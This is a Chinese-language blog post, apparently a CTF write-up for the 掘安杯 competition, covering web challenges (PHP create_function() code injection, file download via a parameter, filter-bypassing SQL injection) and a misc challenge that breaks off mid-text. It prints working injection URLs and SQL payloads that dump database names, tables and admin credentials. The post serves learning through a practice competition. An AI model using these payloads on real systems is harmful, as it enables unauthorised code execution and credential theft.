<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf writeup,">










<meta name="description" content="掘安杯ctf复现，现已复现web签到、not_easy、下载下载、曲折的人生、so_easy、这是什么玩意儿、真的不是图片、你对我网站做了什么？">
<meta name="keywords" content="ctf writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="掘安杯 writeup">
<meta property="og:url" content="http://yoursite.com/2019/04/08/掘安杯-writeup/index.html">
<meta property="og:site_name" content="九罹">
<meta property="og:description" content="掘安杯ctf复现，现已复现web签到、not_easy、下载下载、曲折的人生、so_easy、这是什么玩意儿、真的不是图片、你对我网站做了什么？">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/1.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/2.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/3.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/4.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/6.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/5.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/8.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/7.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/9.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/10.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/11.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/12.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/13.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/14.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/15.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/16.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/17.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/18.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/20.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/22.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/21.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/23.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/24.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/25.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/26.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/27.png">
<meta property="og:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/28.png">
<meta property="og:updated_time" content="2019-05-16T11:57:33.890Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="掘安杯 writeup">
<meta name="twitter:description" content="掘安杯ctf复现，现已复现web签到、not_easy、下载下载、曲折的人生、so_easy、这是什么玩意儿、真的不是图片、你对我网站做了什么？">
<meta name="twitter:image" content="http://yoursite.com/2019/04/08/掘安杯-writeup/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/04/08/掘安杯-writeup/">





  <title>掘安杯 writeup | 九罹</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">九罹</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tools">
          <a href="/categories/工具资源/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-briefcase"></i> <br>
            
            tools
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/04/08/掘安杯-writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Wenz1">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/download.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="九罹">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">掘安杯 writeup</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-04-08T18:20:47+08:00">
                2019-04-08
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/writeup/" itemprop="url" rel="index">
                    <span itemprop="name">writeup</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          
              <div class="post-description">
                  掘安杯ctf复现，现已复现web签到、not_easy、下载下载、曲折的人生、so_easy、这是什么玩意儿、真的不是图片、你对我网站做了什么？
              </div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="web签到"><a href="#web签到" class="headerlink" title="web签到"></a>web签到</h3><p>打开<code>flag在这里</code>的链接，是404界面<br>使用bp抓包<br><img src="1.png" alt="1"><br>进行base64解密，得flag: <span id="inline-red">jactf{jasafe110qweasdzxc}</span></p>
<h3 id="not-easy"><a href="#not-easy" class="headerlink" title="not_easy"></a>not_easy</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">if(isset($_GET[&apos;action&apos;])) &#123;</span><br><span class="line">    $action = $_GET[&apos;action&apos;];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(isset($_GET[&apos;action&apos;]))&#123;</span><br><span class="line">    $arg = $_GET[&apos;arg&apos;];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(preg_match(&apos;/^[a-z0-9_]*$/isD&apos;, $action))&#123;</span><br><span class="line">    show_source(__FILE__);</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    $action($arg,&apos;&apos;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>此题是create_function()代码注入的题目，create_function()代码注入学习链接<a href="https://blog.51cto.com/lovexm/1743442" target="_blank" rel="noopener">https://blog.51cto.com/lovexm/1743442</a></p>
<h4 id="简单介绍create-function-代码注入"><a href="#简单介绍create-function-代码注入" class="headerlink" title="简单介绍create_function()代码注入"></a>简单介绍create_function()代码注入</h4><ol>
<li><p>函数介绍<br>create_function(string $args, string $code);<br> $args : 变量部分 、 $code ： 方法代码部分<br> demo:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">create_function(&apos;$a, $b&apos;, &apos;echo $a\*$b&apos;);</span><br></pre></td></tr></table></figure>
<p> 等价于:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function fun($a,$b)&#123;</span><br><span class="line">	echo $a\*$b;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>代码注入利用<br>测试环境版本：<br>apache +php 5.2、apache +php 5.3<br>有问题代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$id=$_GET[&apos;id&apos;];</span><br><span class="line">$str2=&apos;echo  &apos;.$a.&apos;test&apos;.$id.&quot;;&quot;;</span><br><span class="line">echo $str2;</span><br><span class="line">echo &quot;&lt;br/&gt;&quot;;</span><br><span class="line">echo &quot;==============================&quot;;</span><br><span class="line">echo &quot;&lt;br/&gt;&quot;;</span><br><span class="line">$f1 = create_function(&apos;$a&apos;,$str2);</span><br><span class="line">echo &quot;&lt;br/&gt;&quot;;</span><br><span class="line">echo &quot;==============================&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p> 利用方法：//index.php?id=2;}phpinfo();/*<br> 实现原理：id=2;}phpinfo();/*<br> 执行函数为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">源代码：</span><br><span class="line">function fT($a) &#123;</span><br><span class="line">  echo &quot;test&quot;.$a;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">注入后代码：</span><br><span class="line">function fT($a) &#123;</span><br><span class="line">  echo &quot;test&quot;;&#125;</span><br><span class="line">  phpinfo();/*;//此处为注入代码。</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>本题需要绕过对$action参数的正则过滤,<br><span id="inline-blue">在字母数字下划线都被过滤的情况下调用create_function(),思路是在开头或结尾绕过正则</span><br>可以使用bp进行fuzz发现在函数开头加上字符\(%5c)可以绕过，原因涉及到了php的全局命名空间，\create_function就是调用全局的create_function函数。</p>
<ol>
<li><p>利用create_function()代码注入执行命令<br><code>http://120.79.1.69:10006/?action=%5ccreate_function&amp;arg=){}phpinfo();//</code><br><img src="2.png" alt="2"></p>
</li>
<li><p>继续执行<br><code>http://120.79.1.69:10006/?action=%5ccreate_function&amp;arg=){}var_dump(scandir(&#39;./&#39;));//</code><br><img src="3.png" alt="3"></p>
</li>
<li><p>最后执行<br><code>http://120.79.1.69:10006/?action=%5ccreate_function&amp;arg=){}var_dump(file(&#39;Th1s_1S_F1a9_Hav3_Fun&#39;));//</code><br><img src="4.png" alt="4"></p>
</li>
</ol>
<p>最终可得flag：<span id="inline-red">jactf{c795359da56ae38ec9132eaad24733fc} </span></p>
<h3 id="下载下载"><a href="#下载下载" class="headerlink" title="下载下载"></a>下载下载</h3><p>点击链接下载了一个flag.txt，但是并没有什么用<br>查看源代码</p>
<p><img src="6.png" alt="6"></p>
<p>可以将这个flag.php下载下来<code>http://120.79.1.69:10002/index.php?file=flag.php</code><br>打开文件，在末尾可以发现：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$key=&quot;MyCTF&quot;;</span><br><span class="line">$flag=&quot;o6lziae0xtaqoqCtmWqcaZuZfrd5pbI=&quot;;//encrypt($flag,$key)</span><br></pre></td></tr></table></figure></p>
<p>放在本地进行decrypt()调用</p>
<p><img src="5.png" alt="5"></p>
<p>最终可得：<span id="inline-red">myCTF{cssohw456954GUEB}</span></p>
<h3 id="曲折的人生"><a href="#曲折的人生" class="headerlink" title="曲折的人生"></a>曲折的人生</h3><p><img src="8.png" alt="8"></p>
<p>由此可知存在sql注入，同时可知过滤了or 和空格，测试后可知还过滤了union,select<br>可使用双写绕过or,union,select的过滤,使用/**/绕过空格过滤</p>
<p><img src="7.png" alt="7"></p>
<p>可知回显位是2，然后进行爆库：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=-2%27/**/ununionion/**/sselectelect/**/1,database(),3#&amp;password=123&amp;code=123</span><br></pre></td></tr></table></figure></p>
<p><img src="9.png" alt="9"></p>
<p>爆表名：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=-2%27/**/ununionion/**/sselectelect/**/1,(seselectlect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),3#&amp;password=123&amp;code=123</span><br></pre></td></tr></table></figure></p>
<p><img src="10.png" alt="10"></p>
<p>爆列名：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=-2%27/**/ununionion/**/sselectelect/**/1,(seselectlect/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name=&apos;admin&apos;),3#&amp;password=123&amp;code=123</span><br></pre></td></tr></table></figure></p>
<p><img src="11.png" alt="11"></p>
<p>爆内容：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=-2%27/**/ununionion/**/sselectelect/**/1,(seselectlect/**/passwoorrd/**/from/**/xiaowei.admin),3#&amp;password=123&amp;code=123</span><br></pre></td></tr></table></figure></p>
<p><img src="12.png" alt="12"><img src="13.png" alt="13"></p>
<p>usernaem: goodboy_g-60Hellowoorr (注意or需要双写)<br>password: ajahas&amp;&amp;*44askldajaj<br>最终：<br><img src="14.png" alt="14"></p>
<p>接下来就是编写计算验证码的脚本了<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">#-*- encoding: utf-8 -*-</span><br><span class="line">#在python3 下运行</span><br><span class="line"></span><br><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line">username = &apos;goodboy_g-60Hellowoor&apos;</span><br><span class="line">password = &apos;ajahas&amp;&amp;\*44askldajaj&apos;</span><br><span class="line"></span><br><span class="line">get_url = &apos;http://120.79.1.69:10005/index.php&apos;</span><br><span class="line">post_url = get_url + &apos;?check&apos;</span><br><span class="line"></span><br><span class="line">session = requests.session()</span><br><span class="line">get = session.get(get_url)</span><br><span class="line">get.encoding = &apos;utf-8&apos;</span><br><span class="line">html = get.text</span><br><span class="line"></span><br><span class="line">#print(html)</span><br><span class="line"></span><br><span class="line">str = re.compile(r&apos;[X/]*[（0-9\+\-]+[）]+&apos;).findall(html)</span><br><span class="line">#print(str)</span><br><span class="line">num = &apos;&apos;</span><br><span class="line">for i in str:</span><br><span class="line">        num += i</span><br><span class="line">num = re.sub(&apos;（&apos;,&apos;(&apos;,num)</span><br><span class="line">num = re.sub(&apos;）&apos;, &apos;)&apos;,num)</span><br><span class="line">num = re.sub(&apos;X&apos;, &apos;*&apos;, num)</span><br><span class="line">print(num)</span><br><span class="line">if num:</span><br><span class="line">        vcode = int(eval(num))</span><br><span class="line">        print(&apos;num不为空&apos;)</span><br><span class="line">else:</span><br><span class="line">        print(&apos;num为空&apos;)</span><br><span class="line"></span><br><span class="line">post = session.post(post_url, data=&#123;&apos;uaername&apos;: username, &apos;password&apos;: password, &apos;code&apos;: vcode&#125;)</span><br><span class="line">post.encoding = &apos;utf-8&apos;</span><br><span class="line">print(post.text)</span><br></pre></td></tr></table></figure></p>
<p><img src="15.png" alt="15"></p>
<p>可以得到一个压缩包的下载链接，以及解压密码</p>
<p><img src="16.png" alt="16"></p>
<p>访问<code>http://120.79.1.69:10005/sss88ioiern.gdsgj.zip</code>下载压缩包并解压<br>有一个需要解压密码的flag.zip和一个Form1.txt<br>审计Form1.txt中的代码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">Private Function getPassword(ByVal str As String) As String</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Dim reString As String</span><br><span class="line">    </span><br><span class="line">    Dim i As Integer</span><br><span class="line">    i = 1</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    While (i &lt;= Len(str))</span><br><span class="line">    </span><br><span class="line">     reString = reString &amp; Mid(str, i, 1)</span><br><span class="line">     i = i + (i Mod 5)</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    Wend</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">    getPassword = reString</span><br><span class="line"></span><br><span class="line">End Function</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Private Sub Command1_Click()</span><br><span class="line"></span><br><span class="line">   Dim Dictionary As String</span><br><span class="line">    </span><br><span class="line">   Dictionary = &quot;VmxSS05HSXhXbkpOV0VwT1YwVmFWRll3Wkc5VVJsbDNWMnhhYkZac1NqQlpNRll3VlRBeFNWRnNjRmRpUmtwSVZsY3hSMk14V2xsalJsSnBVakpvV0ZaR1dsWmxSbHBYWWtSYVZtRjZWbGRVVmxwelRrWmFTR1ZHWkZSaGVrWlhWR3hTVjFZeVJuSlhiRUpYWVRGYVYxcFhlRkprTVZaeVkwZHNVMDFWY0ZkV2JURXdWREZSZUZkcmFGVmlhelZvVlcxNFMxWXhjRlpXVkVaUFlrYzVObGt3VmpCWFJrcHpWbXBTVjFadFVqTldiWE4zWkRKT1IySkdaRmRTVm5CUVZtMTBhMVJyTVVkVmJrcFZZa2RTVDFac1VsZFdNVlY0Vld0a1ZVMXNXbGhXTVdodlZsZEtSMU5yWkZWV1JVVXhWV3hhWVZkSFZraGtSbVJUWWtoQ1JsWnJaRFJWTWtaMFUydG9WbUpHV2xoV01HUnZWVVp3V0UxWGNHeFdhelY2V1ZWYVlWUnNXbkpYYm1oWFlrWktVRlY2Um10U01WcFpZVVpXVjJKRmNIaFdSM1JXVFZVd2QyTkdWbFZoTVZwTVZtdFZNVkpuSlRORUpUTkU=&quot;</span><br><span class="line">   </span><br><span class="line">   Dim password As String</span><br><span class="line">   </span><br><span class="line">   password = getPassword(Dictionary)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">   Dim psw As String</span><br><span class="line">   </span><br><span class="line">   psw = Text1.Text</span><br><span class="line">   </span><br><span class="line"></span><br><span class="line">   If (psw = password) Then</span><br><span class="line">   </span><br><span class="line">    MsgBox &quot;The password is correct!&quot;, vbOKOnly, &quot;密码正确&quot;</span><br><span class="line">    </span><br><span class="line">    Text1.Text = &quot;Password for next pass : &quot; &amp; getPassword(password)</span><br><span class="line">       </span><br><span class="line">   Else</span><br><span class="line">   </span><br><span class="line">    MsgBox &quot;PasswordFail!&quot;, vbOKOnly, &quot;密码错误&quot;</span><br><span class="line">    </span><br><span class="line">      </span><br><span class="line">   End If</span><br><span class="line">   </span><br><span class="line">      </span><br><span class="line"></span><br><span class="line">End Sub</span><br></pre></td></tr></table></figure></p>
<p>将Form1.txt中的伪代码进行输出：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">dict=&quot;VmxSS05HSXhXbkpOV0VwT1YwVmFWRll3Wkc5VVJsbDNWMnhhYkZac1NqQlpNRll3VlRBeFNWRnNjRmRpUmtwSVZsY3hSMk14V2xsalJsSnBVakpvV0ZaR1dsWmxSbHBYWWtSYVZtRjZWbGRVVmxwelRrWmFTR1ZHWkZSaGVrWlhWR3hTVjFZeVJuSlhiRUpYWVRGYVYxcFhlRkprTVZaeVkwZHNVMDFWY0ZkV2JURXdWREZSZUZkcmFGVmlhelZvVlcxNFMxWXhjRlpXVkVaUFlrYzVObGt3VmpCWFJrcHpWbXBTVjFadFVqTldiWE4zWkRKT1IySkdaRmRTVm5CUVZtMTBhMVJyTVVkVmJrcFZZa2RTVDFac1VsZFdNVlY0Vld0a1ZVMXNXbGhXTVdodlZsZEtSMU5yWkZWV1JVVXhWV3hhWVZkSFZraGtSbVJUWWtoQ1JsWnJaRFJWTWtaMFUydG9WbUpHV2xoV01HUnZWVVp3V0UxWGNHeFdhelY2V1ZWYVlWUnNXbkpYYm1oWFlrWktVRlY2Um10U01WcFpZVVpXVjJKRmNIaFdSM1JXVFZVd2QyTkdWbFZoTVZwTVZtdFZNVkpuSlRORUpUTkU=&quot;</span><br><span class="line">def getpwd(str):</span><br><span class="line">    restr=&quot;&quot;</span><br><span class="line">    i=1</span><br><span class="line">    while i&lt;=len(str):</span><br><span class="line">        restr = restr+(str[i-1:i])</span><br><span class="line">        i=i+(i%5)</span><br><span class="line">    return restr</span><br><span class="line">passwd=getpwd(dict)</span><br><span class="line">pw=getpwd(passwd)</span><br><span class="line">print(pw)</span><br></pre></td></tr></table></figure></p>
<p>运行得解压密码：<br>    <code>VmH0wW3DZalBnmmSalV1SYSGRr1r3jVYcFrHWkUUlhljkFzCbXaEKyaVJymT1FlVTVskVWhGtonaGU2WWGhVXYol1WVI1F2odFuk</code><br>将解压的flag.png修改后缀名为flag.txt，即可查看flag<br>最终可得：<span id="inline-red">flag{Good luck!}</span></p>
<h2 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h2><h3 id="so-easy"><a href="#so-easy" class="headerlink" title="so_easy"></a>so_easy</h3><p>将<code>jactf_7e05c6db9b3bb2171be76c336a50d150.exe</code>使用winhex或记事本打开<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Kf3kAFJMri71zQLADjAuHAPwXtTCSwRrcF9oeig4tZwqpur8i88LoJU1v8LcaKt2WutLqtRp988veY5FfyMwqs3zZiNvhqb6zFTHpn3fSmFuaogagzdqEuq5GiynnGfL7hQC9fbEKJV4MxqLYd9F6LvweLJ3cEaRfMjde2bvZUfgvgXDkCx8g7DwHrH7Mp4usUdB1YmgeuyKP1Z6GARYaWBDzunJ6dePDtddCkD2G11eF9E9vJooAPrZ7U3s1xeW1UYabFmLazHs5QkvthXeJqZewHDXEUCrBnnoYXZCbHBHfP9sD6NAgS3Gr6ZT6h4HNK9qkttjxk6SVF1ABfPmRsLCQXr6C6vnWq9YR1fk9hHCiW4sFiKPe2QR24h9dFFfjV4Pk3h6LawqT8me4rE1vJTBnMnhm4caXqGNhxz74GY1WmzUfWyrXmN3K1PvkhzARnFytP8ot5FsNzL3uHvJguE3mbKBuGdPQuCBk27D2CwXDtBdhcHXc9mATg89xtnmk2Wjro9PVvZqaxtWzMWsi1d91fu7RFRRJcJQ61ScaxyX9bop485xMszPSDVL1sxDHk5aCzJ6isswjntmqdix4WogfDQwRHwQyj6cBhkwdo52aV76t9Yw6sqGgi6ra6FyPp2ygPtoJrcpgJCXm9P23VoE9XEopJfr7MEpfoVvLon9xuSQ1JnyHKYSFcJoU5RX7erNWhY3bp4wUACr9JGRcGXrcGs9JjKqVnVGamNUc97xtrsbTYmMJYXp9HwPMFT7YQww9R8d3gE39JmhM214fr9ESZWzWac1nbhYdvbPS9edLe5wkjzNvGrmzctSfXU7ciGgMF8gAjsrMwBXQ9Kj9oLqVCfSXZHwBXcNthyjQt5hYAaRZnfxZLdoFXRmSByPSZjKrWa7K8sKNebbQTu1cEQ4f3rEuPFgpunELkrm8j7gcJyJmARdkiD5fqmgW9R2vNB9kXPNBMJqCham2kkfYe2NwteGzpiB3EsNhJiEk4GSQXEJ43FSW23rwYUaaq9E3LSL2jcBhndTbdcAvp3HZufRtvVKHxYL3tgnLHKZtPKRgZez7WGUR2LgJwQJ48dA8zcoyWovcDq2Mkz43JPJLkAXhtaFaAdvXpV3YMRNcGwCy6BftzA2vewJNroERmNHgLzJFa4LqnKB91iN2wcm6vF28YFwZjepujaZiEMqdUcEdiyG6M7cC2Pot9SXJB6Hzd16H9WhSE9Qs8RFy6AMFbxvvTpW6CYhNMdSr4kBzCB1iTb8jPHK6vU4aMscD14kamgYnsKdxqpiR9AFSwzWmDQnXLWPumWAwpbX7STv8pGWMD9uKxEJ9VUaFYwM9iZsZj7ifo8qdvvqqakA4paZrjaM2mXk2iHH3tpJ1gWLVQ4ttkSBqrcVPvoCRwa7WETN2eYWLMYsvdzMJUC5yPitV6TJmYuJv5CWY4Vd4xXe38itZmDAthPupY7fF61ATgmxmMbpJU7bHZdNwC